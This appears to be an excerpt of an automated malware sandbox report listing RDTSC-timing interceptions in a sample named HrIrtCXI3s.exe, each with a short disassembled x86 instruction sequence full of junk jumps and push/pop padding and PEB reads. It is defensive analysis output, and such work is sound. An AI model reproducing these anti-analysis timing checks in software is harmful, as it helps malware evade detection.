Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: F2DFF4 second address: F2DFF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: F2E45F second address: F2E476 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FFBBCD95551h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: F2E476 second address: F2E47A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: F3126D second address: F31273 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: F31273 second address: F3127A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: F315AF second address: F315C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: F315C0 second address: F315C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: F315C4 second address: F315DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD95555h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: F31880 second address: F31888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: F31888 second address: F318E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp], eax 0x0000000b jmp 00007FFBBCD95557h 0x00000010 push dword ptr [ebp+122D1AA1h] 0x00000016 and edx, 3020FFE3h 0x0000001c jbe 00007FFBBCD9554Ch 0x00000022 sub dword ptr [ebp+122D1C41h], edx 0x00000028 push F8ED617Bh 0x0000002d pushad 0x0000002e pushad 0x0000002f pushad 0x00000030 popad 0x00000031 pushad 0x00000032 popad 0x00000033 popad 0x00000034 pushad 0x00000035 jmp 00007FFBBCD95555h 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: F32B80 second address: F32BBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD7295h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FFBBCAD7299h 0x0000000e jmp 00007FFBBCAD728Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: F34904 second address: F3490A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220019 second address: 7220036 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD7299h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220036 second address: 7220081 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FFBBCD9554Dh 0x0000000b xor ch, 00000046h 0x0000000e jmp 00007FFBBCD95551h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 jmp 00007FFBBCD9554Eh 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FFBBCD9554Eh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220081 second address: 72200B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FFBBCAD7291h 0x00000008 pop esi 0x00000009 mov eax, edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FFBBCAD7296h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72200B4 second address: 722010D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD9554Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FFBBCD95552h 0x00000013 jmp 00007FFBBCD95555h 0x00000018 popfd 0x00000019 jmp 00007FFBBCD95550h 0x0000001e popad 0x0000001f popad 0x00000020 mov eax, dword ptr fs:[00000030h] 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 722010D second address: 7220111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220111 second address: 72201E0 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FFBBCD95556h 0x00000008 sbb ch, FFFFFFC8h 0x0000000b jmp 00007FFBBCD9554Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushfd 0x00000014 jmp 00007FFBBCD95558h 0x00000019 adc esi, 0331C728h 0x0000001f jmp 00007FFBBCD9554Bh 0x00000024 popfd 0x00000025 popad 0x00000026 sub esp, 18h 0x00000029 pushad 0x0000002a call 00007FFBBCD95554h 0x0000002f movzx ecx, di 0x00000032 pop edi 0x00000033 mov ecx, 36BC5AA3h 0x00000038 popad 0x00000039 xchg eax, ebx 0x0000003a jmp 00007FFBBCD95556h 0x0000003f push eax 0x00000040 pushad 0x00000041 pushfd 0x00000042 jmp 00007FFBBCD95551h 0x00000047 and si, B756h 0x0000004c jmp 00007FFBBCD95551h 0x00000051 popfd 0x00000052 popad 0x00000053 xchg eax, ebx 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007FFBBCD9554Fh 0x0000005d rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72201E0 second address: 72201FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD7299h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72201FD second address: 722020D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFBBCD9554Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 722020D second address: 7220211 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220211 second address: 7220239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [eax+10h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FFBBCD95559h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220239 second address: 722023D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 722023D second address: 7220243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220243 second address: 7220249 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220249 second address: 722024D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 722024D second address: 72202A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 pushad 0x0000000a mov ebx, eax 0x0000000c mov edi, eax 0x0000000e popad 0x0000000f push eax 0x00000010 jmp 00007FFBBCAD7299h 0x00000015 xchg eax, esi 0x00000016 jmp 00007FFBBCAD728Eh 0x0000001b mov esi, dword ptr [74E806ECh] 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FFBBCAD7297h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72202A4 second address: 72202D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD95559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FFBBCD9554Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72202D2 second address: 72202D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72202D8 second address: 72202DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72202DC second address: 7220390 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FFBBCAD822Ch 0x0000000e jmp 00007FFBBCAD728Fh 0x00000013 xchg eax, edi 0x00000014 pushad 0x00000015 push esi 0x00000016 pushfd 0x00000017 jmp 00007FFBBCAD728Bh 0x0000001c and si, 56DEh 0x00000021 jmp 00007FFBBCAD7299h 0x00000026 popfd 0x00000027 pop ecx 0x00000028 mov edx, 54773254h 0x0000002d popad 0x0000002e push eax 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007FFBBCAD7298h 0x00000036 and ax, F608h 0x0000003b jmp 00007FFBBCAD728Bh 0x00000040 popfd 0x00000041 mov dl, ch 0x00000043 popad 0x00000044 xchg eax, edi 0x00000045 jmp 00007FFBBCAD728Bh 0x0000004a call dword ptr [74E50B60h] 0x00000050 mov eax, 750BE5E0h 0x00000055 ret 0x00000056 pushad 0x00000057 mov di, ax 0x0000005a mov edx, esi 0x0000005c popad 0x0000005d push 00000044h 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007FFBBCAD7294h 0x00000068 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220390 second address: 722039F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD9554Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 722039F second address: 7220453 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFBBCAD728Fh 0x00000009 add eax, 5CF1C90Eh 0x0000000f jmp 00007FFBBCAD7299h 0x00000014 popfd 0x00000015 push ecx 0x00000016 pop edi 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop edi 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FFBBCAD7294h 0x00000022 xor eax, 501EFAB8h 0x00000028 jmp 00007FFBBCAD728Bh 0x0000002d popfd 0x0000002e popad 0x0000002f xchg eax, edi 0x00000030 pushad 0x00000031 mov di, cx 0x00000034 pushfd 0x00000035 jmp 00007FFBBCAD7290h 0x0000003a sbb ax, 3518h 0x0000003f jmp 00007FFBBCAD728Bh 0x00000044 popfd 0x00000045 popad 0x00000046 push eax 0x00000047 jmp 00007FFBBCAD7299h 0x0000004c xchg eax, edi 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007FFBBCAD728Dh 0x00000054 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220453 second address: 72204AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFBBCD95557h 0x00000008 pushfd 0x00000009 jmp 00007FFBBCD95558h 0x0000000e sbb ah, 00000038h 0x00000011 jmp 00007FFBBCD9554Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push dword ptr [eax] 0x0000001c pushad 0x0000001d mov al, FEh 0x0000001f popad 0x00000020 mov eax, dword ptr fs:[00000030h] 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushad 0x0000002a popad 0x0000002b mov eax, edx 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72204AC second address: 72204E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FFBBCAD728Ch 0x00000008 pop ecx 0x00000009 call 00007FFBBCAD728Bh 0x0000000e pop esi 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push dword ptr [eax+18h] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FFBBCAD7291h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72204E3 second address: 72204F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD95551h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220541 second address: 7220554 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD728Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72206AF second address: 72206B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72206B4 second address: 72206BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, C7h 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72206BB second address: 72206CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esi+10h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72206CC second address: 72206D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72206D1 second address: 72206D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72206D7 second address: 72206DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72206DB second address: 722071C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+50h] 0x0000000b jmp 00007FFBBCD95552h 0x00000010 mov dword ptr [esi+14h], eax 0x00000013 jmp 00007FFBBCD95550h 0x00000018 mov eax, dword ptr [ebx+54h] 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FFBBCD9554Ah 0x00000024 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 722071C second address: 7220720 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220720 second address: 7220726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220726 second address: 7220754 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD728Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+18h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFBBCAD7297h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220754 second address: 7220801 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD95559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+58h] 0x0000000c pushad 0x0000000d jmp 00007FFBBCD9554Ch 0x00000012 call 00007FFBBCD95552h 0x00000017 pushfd 0x00000018 jmp 00007FFBBCD95552h 0x0000001d and cl, FFFFFFE8h 0x00000020 jmp 00007FFBBCD9554Bh 0x00000025 popfd 0x00000026 pop eax 0x00000027 popad 0x00000028 mov dword ptr [esi+1Ch], eax 0x0000002b jmp 00007FFBBCD9554Fh 0x00000030 mov eax, dword ptr [ebx+5Ch] 0x00000033 jmp 00007FFBBCD95556h 0x00000038 mov dword ptr [esi+20h], eax 0x0000003b pushad 0x0000003c mov cx, bx 0x0000003f popad 0x00000040 mov eax, dword ptr [ebx+60h] 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007FFBBCD95552h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220801 second address: 7220829 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD728Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+24h], eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f call 00007FFBBCAD7292h 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220829 second address: 722082D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 722082D second address: 7220884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov si, dx 0x00000009 popad 0x0000000a mov eax, dword ptr [ebx+64h] 0x0000000d jmp 00007FFBBCAD7293h 0x00000012 mov dword ptr [esi+28h], eax 0x00000015 pushad 0x00000016 mov al, 9Dh 0x00000018 pushfd 0x00000019 jmp 00007FFBBCAD7291h 0x0000001e xor ch, FFFFFF86h 0x00000021 jmp 00007FFBBCAD7291h 0x00000026 popfd 0x00000027 popad 0x00000028 mov eax, dword ptr [ebx+68h] 0x0000002b pushad 0x0000002c movzx esi, bx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220884 second address: 72208B6 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FFBBCD95552h 0x00000008 sub ax, BC58h 0x0000000d jmp 00007FFBBCD9554Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 mov dword ptr [esi+2Ch], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72208B6 second address: 72208D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD7297h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72208D1 second address: 72208D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72208D7 second address: 7220991 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD728Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ax, word ptr [ebx+6Ch] 0x0000000f jmp 00007FFBBCAD7296h 0x00000014 mov word ptr [esi+30h], ax 0x00000018 jmp 00007FFBBCAD7290h 0x0000001d mov ax, word ptr [ebx+00000088h] 0x00000024 jmp 00007FFBBCAD7290h 0x00000029 mov word ptr [esi+32h], ax 0x0000002d jmp 00007FFBBCAD7290h 0x00000032 mov eax, dword ptr [ebx+0000008Ch] 0x00000038 pushad 0x00000039 mov bh, al 0x0000003b pushfd 0x0000003c jmp 00007FFBBCAD7293h 0x00000041 sbb esi, 1E40289Eh 0x00000047 jmp 00007FFBBCAD7299h 0x0000004c popfd 0x0000004d popad 0x0000004e mov dword ptr [esi+34h], eax 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007FFBBCAD728Dh 0x00000058 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220991 second address: 72209D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD95551h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+18h] 0x0000000c jmp 00007FFBBCD9554Eh 0x00000011 mov dword ptr [esi+38h], eax 0x00000014 jmp 00007FFBBCD95550h 0x00000019 mov eax, dword ptr [ebx+1Ch] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72209D3 second address: 72209D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72209D7 second address: 72209DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72209DD second address: 7220A98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, ax 0x00000006 pushfd 0x00000007 jmp 00007FFBBCAD728Eh 0x0000000c and si, 3E88h 0x00000011 jmp 00007FFBBCAD728Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [esi+3Ch], eax 0x0000001d jmp 00007FFBBCAD7296h 0x00000022 mov eax, dword ptr [ebx+20h] 0x00000025 pushad 0x00000026 movzx ecx, bx 0x00000029 popad 0x0000002a mov dword ptr [esi+40h], eax 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007FFBBCAD728Bh 0x00000034 jmp 00007FFBBCAD7293h 0x00000039 popfd 0x0000003a jmp 00007FFBBCAD7298h 0x0000003f popad 0x00000040 lea eax, dword ptr [ebx+00000080h] 0x00000046 pushad 0x00000047 pushfd 0x00000048 jmp 00007FFBBCAD728Eh 0x0000004d and ecx, 2CC698D8h 0x00000053 jmp 00007FFBBCAD728Bh 0x00000058 popfd 0x00000059 mov dx, cx 0x0000005c popad 0x0000005d push 00000001h 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 pushad 0x00000064 popad 0x00000065 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220A98 second address: 7220A9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220A9C second address: 7220AA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220AA2 second address: 7220ADD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD95556h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FFBBCD9554Dh 0x00000013 jmp 00007FFBBCD9554Bh 0x00000018 popfd 0x00000019 mov edi, esi 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220ADD second address: 7220B2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFBBCAD728Bh 0x00000008 pushfd 0x00000009 jmp 00007FFBBCAD7298h 0x0000000e or esi, 35285F28h 0x00000014 jmp 00007FFBBCAD728Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e pushad 0x0000001f mov ebx, 47CBADCAh 0x00000024 pushad 0x00000025 movsx edi, si 0x00000028 popad 0x00000029 popad 0x0000002a nop 0x0000002b pushad 0x0000002c push esi 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220BA0 second address: 7220BA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220BA6 second address: 7220BDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD728Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov di, 6320h 0x00000012 jmp 00007FFBBCAD7299h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220BDB second address: 7220C1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, CEh 0x00000005 call 00007FFBBCD95558h 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test edi, edi 0x00000010 jmp 00007FFBBCD95551h 0x00000015 js 00007FFC2A973FFAh 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220C1B second address: 7220C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220C1F second address: 7220C25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
